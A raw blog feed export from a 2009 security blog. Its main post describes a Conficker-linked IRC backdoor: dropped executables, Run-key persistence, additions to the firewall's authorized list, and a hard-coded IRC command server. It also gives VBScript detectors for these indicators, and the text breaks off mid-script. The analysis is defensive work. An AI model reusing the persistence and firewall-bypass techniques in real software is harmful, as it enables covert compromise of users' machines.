the screen goes black. If the battery was fully charged, this might take a couple of hours.&lt;/p&gt;  &lt;p style="margin: 0in 0in 0.0001pt 0.5in; text-indent: -0.25in;"&gt;&lt;span style=""&gt;3.&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;Wait until after noon GMT on January 1, 2009 (that&amp;#39;s 7 a.m. Eastern or 4 a.m. Pacific time).&lt;/p&gt;  &lt;p style="margin: 0in 0in 0.0001pt 0.5in; text-indent: -0.25in;"&gt;&lt;span style=""&gt;4.&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;Connect your Zune to either a USB port on the back or your computer or to AC power using the Zune AC Adapter and let it charge.&lt;/p&gt;  &lt;p style="margin: 0in 0in 0.0001pt 0.5in; text-indent: -0.25in;"&gt;&lt;span style=""&gt;1.&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;Once the battery has sufficient power, the player should start normally. No other action is required-you can go back to using your Zune!&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;Further there is also a fix in the ZUNE support website.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;a href="http://www.zune.net/en-US/support"&gt;http://www.zune.net/en-US/support&lt;/a&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;u&gt;References&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;  &lt;ol style="margin-top: 0in;" start="1" type="1"&gt;&lt;li class="MsoNormal" style="text-align: justify;"&gt;&lt;a href="http://www.securityfocus.com/brief/878"&gt;http://www.securityfocus.com/brief/878&lt;/a&gt;&lt;/li&gt;&lt;li class="MsoNormal" style="text-align: justify;"&gt; &lt;a href="http://www.reuters.com/article/technologyNews/idUSTRE5001LD20090101"&gt;http://www.reuters.com/article/technologyNews/idUSTRE5001LD20090101&lt;/a&gt;&lt;/li&gt;&lt;li class="MsoNormal" style="text-align: justify;"&gt;&lt;a href="http://www.pcworld.com/article/156248/microsofts_official_fix_for_failing_zunes.html"&gt;http://www.pcworld.com/article/156248/microsofts_official_fix_for_failing_zunes.html&lt;/a&gt;&lt;/li&gt; &lt;li class="MsoNormal" style="text-align: justify;"&gt;&lt;a href="http://online.wsj.com/article/SB123074469238845927.html?mod=special_page_campaign2008_mostpop"&gt;http://online.wsj.com/article/SB123074469238845927.html?mod=special_page_campaign2008_mostpop&lt;/a&gt;&lt;/li&gt; &lt;/ol&gt;  &lt;span style="font-size: 12pt; font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;br style="page-break-before: always;" clear="all"&gt; &lt;/span&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&amp;nbsp;&lt;/p&gt;   &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-1517521855677745722?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/1517521855677745722/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=1517521855677745722' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/1517521855677745722'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/1517521855677745722'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2009/01/zune-player-bug-and-fix.html' title='Zune Player Bug and Fix'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-5055971477435420653</id><published>2009-01-04T23:16:00.001-08:00</published><updated>2009-01-22T11:44:33.059-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Remote Memory Corruption Vulnerability'/><category scheme='http://www.blogger.com/atom/ns#' term='security updates for w32.downadup.b'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnets and DNS'/><category scheme='http://www.blogger.com/atom/ns#' term='Removal tool for w32.downadup.b'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Conficker mem svchost.exe'/><category scheme='http://www.blogger.com/atom/ns#' term='removal tool virus W32.Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='RPC Exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='ms-08067 exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B microsoft removal tools'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='MS-08067'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B + removal tools'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Confick-A'/><category scheme='http://www.blogger.com/atom/ns#' term='w32.downadup.b removal tool'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='MS 08-067'/><category scheme='http://www.blogger.com/atom/ns#' term='new worm'/><category scheme='http://www.blogger.com/atom/ns#' term='ms 08-067 exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><category scheme='http://www.blogger.com/atom/ns#' term='w32.downadup and Botnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnets'/><title type='text'>W32.Downadup and W32.Downadup.B related to Bot and Botnet</title><content type='html'>I found some bot and Botnet activity information related to the latest worm W32.Downadup and W32.Downadup.B yesterday while going through some articles, have a look at the following link for details.&lt;br&gt;&lt;br&gt;&lt;a href="http://wormsandexploits.blogspot.com/2009/01/found-bot-and-botnet-related-to_04.html"&gt;http://wormsandexploits.blogspot.com/2009/01/found-bot-and-botnet-related-to_04.html&lt;/a&gt;&lt;br&gt; &lt;br&gt;W&amp;amp;E&lt;br&gt;&lt;br&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-5055971477435420653?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/5055971477435420653/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=5055971477435420653' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/5055971477435420653'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/5055971477435420653'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2009/01/w32downadup-and-w32downadupb-related-to.html' title='W32.Downadup and W32.Downadup.B related to Bot and Botnet'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-6245861376373602139</id><published>2009-01-04T09:23:00.001-08:00</published><updated>2009-01-04T22:48:35.734-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Remote Memory Corruption Vulnerability'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnets and DNS'/><category scheme='http://www.blogger.com/atom/ns#' term='Removal tool for w32.downadup.b'/><category scheme='http://www.blogger.com/atom/ns#' term='security updates for w32.downadup.b'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Conficker mem svchost.exe'/><category scheme='http://www.blogger.com/atom/ns#' term='MS 08067 virus'/><category scheme='http://www.blogger.com/atom/ns#' term='removal tool virus W32.Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='RPC Exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Conficker'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B microsoft removal tools'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B + removal tools'/><category scheme='http://www.blogger.com/atom/ns#' term='ms exploit 08067'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Confick-A'/><category scheme='http://www.blogger.com/atom/ns#' term='w32.downadup.b removal tool'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='MS 08-067'/><category scheme='http://www.blogger.com/atom/ns#' term='ms 08-067 exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='w32.downadup Bot'/><category scheme='http://www.blogger.com/atom/ns#' term='w32.downadup and Botnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnets'/><title type='text'>W32.Downadup and W32.Downadup.B related Bot and Botnet.....</title><content type='html'>&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5CDEEPAY%7E1%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:&amp;quot;&amp;quot;; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;} h4 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	mso-outline-level:4; 	font-size:12.0pt; 	font-family:&amp;quot;Times New Roman&amp;quot;;} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:1543976324; 	mso-list-type:hybrid; 	mso-list-template-ids:-1886858192 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l0:level1 	{mso-level-tab-stop:1.0in; 	mso-level-number-position:left; 	margin-left:1.0in; 	text-indent:-.25in;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --&gt; &lt;/style&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt; text-align: justify;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;Hi, its Sunday today and I was looking through the internet to get some more info on the latest menace (yes I call it a menace, its creating a lot of people digging information on the net to get rid of it), and you know what, I got some more new links to write for this article to publish in my blog. I was looking on to the Microsoft website for the worm &lt;/span&gt;&lt;span style="font-size:10;"&gt;Win32/Conficker.A and Win32/Conficker.B&lt;/span&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;, I got a new lead that this worm is also linked with a &lt;/span&gt;&lt;span style="font-size:10;"&gt;&lt;a href="http://wormsandexploits.blogspot.com/2008/11/how-bots-are-spread_3465.html"&gt;Botnet&lt;/a&gt;&lt;/span&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; backdoor named as &lt;/span&gt;&lt;span style="font-size:10;"&gt;Backdoor:Win32/IRCbot.BH&lt;/span&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; by Microsoft. Wow the Botnet herders are doing a big time, you know what this bot is a Backdoor, and which gets its commands from an attacker via an IRC server. Backdoor:Win32/IRCbot.BH is used by bots attempting to exploit MS08-067. &lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt; text-align: justify; text-indent: 0.5in;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; &lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt; text-align: justify; text-indent: 0.5in;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;This Trojan when executed create files in "Program Files" folder as an exe files with the following names.&lt;/span&gt;&lt;/h4&gt;  &lt;p class="MsoNormal" style="margin-left: 0.5in;"&gt;&lt;span style="font-size:10;"&gt;mediaavi.exe&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 0.5in;"&gt;&lt;span style="font-size:10;"&gt;msgaurd.exe&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 0.5in;"&gt;&lt;span style="font-size:10;"&gt;soundmax.exe&lt;/span&gt;&lt;/p&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt; text-align: justify;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;This also modifies the registry value as per the following:&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt; text-align: justify;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; &lt;/span&gt;&lt;/h4&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt;Adds value: "MS Gaurd Driver"&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt;With data: "%ProgramFiles%\msgaurd.exe"&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt;Adds value: "SoundMAX Driver"&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt;With data: "%ProgramFiles%\soundmax.exe"&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt;Adds value: "MediaAVI Driver"&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt;With data: "%ProgramFiles%\mediaavi.exe"&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt;To subkeys:&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/span&gt;&lt;/p&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt; text-align: justify;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; &lt;/span&gt;&lt;/h4&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt;The Trojan stays resident in memory and connects to a hard-coded remote IRC server and awaits commands from the Botnet master. And the commands could include sending the trojan to other computers by using hard-coded exploits.&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt;It also modifies the registry to add the trojan to the Windows Firewall for authorizing in its authorized applications list.&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt;Adds value: "&amp;lt;&lt;em&gt;Win32/IRCbot.BH path and filename&lt;/em&gt;&amp;gt;" (probably the one of the three from above locations)&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt;With data: "enabled:soundmax driver:*:&amp;lt;&lt;em&gt;Win32/IRCbot.BH path and filename&lt;/em&gt;&amp;gt;"&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt;To subkey: HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\&lt;br /&gt;FirewallPolicy\StandardProfile\AuthorizedApplications\List&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="font-size:10;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:10;"&gt;After making all necessary copying of executables and registry entries it attempts to connect to the hard-coded remote IRC server named '0x90 [dot] devtech [dot] us' using TCP port 6556 and then this trojan joins a pre-decided channel  and awaits commands from an attacker. Using this backdoor, the attacker can order this bot to attempt to spread and infect more and increase its Botnet army by scanning for available computers and attempts to connect to them and attempts to execute remote code by first running exploit code against the target computer which are vulnerable and not yet patched by &lt;a href="http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx"&gt;Security Bulletin MS08-067&lt;/a&gt;.&lt;/span&gt;&lt;/p&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-size:10;"&gt; &lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;I tried to write two small VBScript to find those Botnet executable files in Program Files and the relevant registry entry.&lt;/span&gt;&lt;/h4&gt;  &lt;div  style="border-style: none none double; padding: 0in 0in 1pt;color:-moz-use-text-color -moz-use-text-color windowtext;"&gt;  &lt;h4 style="border: medium none ; margin: 0in 0in 0.0001pt; padding: 0in;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; &lt;/span&gt;&lt;/h4&gt;  &lt;/div&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;Find in Program Files.&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; &lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;strDir = "c:\Program Files\" 'Change the location of Path of "Program Files" according to your location&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;Set FSO = CreateObject("Scripting.FileSystemObject")&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;Set objDir = FSO.GetFolder(strDir)&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;getInfo(objDir)&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; &lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;Sub getInfo(pCurrentDir)&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;Dim checkName&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;Dim checkVal&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; &lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;checkVal=False&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; &lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;For Each aItem In pCurrentDir.Files&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;  &lt;/span&gt;&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;   &lt;/span&gt;If LCase(Right(Cstr(aItem.Name),4)) = ".exe" Then&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;   &lt;/span&gt;&lt;span style=""&gt;             &lt;/span&gt;if aItem.Name="msgaurd.exe" or aItem.Name="soundmax.exe" or aItem.Name="mediaavi.exe" then &lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;                                &lt;/span&gt;checkName=checkName + ", " +aItem.Name&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;                                &lt;/span&gt;checkVal=True&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;                &lt;/span&gt;End if&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;   &lt;/span&gt;End If&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;                &lt;/span&gt;&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;Next&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; &lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;if checkVal=True then&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;                &lt;/span&gt;MsgBox "Bot Files " &amp;amp; checkName &amp;amp; " Present"&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;else&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;                &lt;/span&gt;MsgBox "Bot files not present"&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;End if&lt;span style=""&gt;      &lt;/span&gt;&lt;/span&gt;&lt;/h4&gt;  &lt;div  style="border-style: none none double; padding: 0in 0in 1pt;color:-moz-use-text-color -moz-use-text-color windowtext;"&gt;  &lt;h4 style="border: medium none ; margin: 0in 0in 0.0001pt; padding: 0in;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;End Sub&lt;/span&gt;&lt;/h4&gt;  &lt;/div&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; &lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;For the registry Entries:&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;const HKEY_LOCAL_MACHINE = &amp;amp;H80000002&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;strComputer = "."&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;Set StdOut = WScript.StdOut&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;Set oReg=GetObject( "winmgmts:{impersonationLevel=impersonate}!\\" &amp;amp; strComputer &amp;amp; "\root\default:StdRegProv")&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; &lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;For i=0 to 2&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; &lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;                &lt;/span&gt;SELECT CASE i&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt; &lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;                                &lt;/span&gt;CASE 0&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;                                                &lt;/span&gt;strValueName0 = "MS Gaurd Driver"&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;                                                &lt;/span&gt;oReg.GetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName0,dwValue0&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;                                &lt;/span&gt;CASE 1&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;                                                &lt;/span&gt;strValueName1 = "SoundMAX Driver"&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;                                                &lt;/span&gt;oReg.GetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName1,dwValue1&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;                                &lt;/span&gt;CASE 2&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;                                                &lt;/span&gt;strValueName2 = "MediaAVI Driver"&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" &gt;&lt;span style=""&gt;                                                &lt;/span&gt;oReg.GetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName2,dwValue2&lt;/span&gt;&lt;/h4&gt;  &lt;h4 style="margin: 0in 0in 0.0001pt;"&gt;&lt;span style="font-weight: normal;font-size:10;" 